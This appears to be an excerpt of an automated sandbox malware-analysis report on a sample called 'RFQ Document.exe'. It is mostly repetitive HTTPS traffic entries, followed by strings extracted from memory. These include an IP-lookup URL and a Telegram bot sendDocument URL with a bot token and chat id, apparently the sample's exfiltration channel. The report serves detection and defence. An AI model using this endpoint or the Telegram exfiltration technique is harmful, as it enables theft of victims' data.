Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035

Source: RFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RFQ Document.exe	String found in binary or memory: http://checkip.dyndns.org/
Source: RFQ Document.exe, 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RFQ Document.exe, 00000002.00000002.926172062.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RFQ Document.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: RFQ Document.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: RFQ Document.exe	String found in binary or memory: http://schemas.m
Source: RFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ Document.exe, 00000002.00000003.861059471.0000000002A86000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram
Source: RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000003.861005087.0000000002A7A000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664
Source: RFQ Document.exe, 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org41lX
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81l
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81l$T
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81l$U
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81l(
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81l4
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lD
Source: RFQ Document.exe, 00000002.00000002.929106581.0000000005EFE000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lDP
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lL
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lL-
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lLH
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lLc
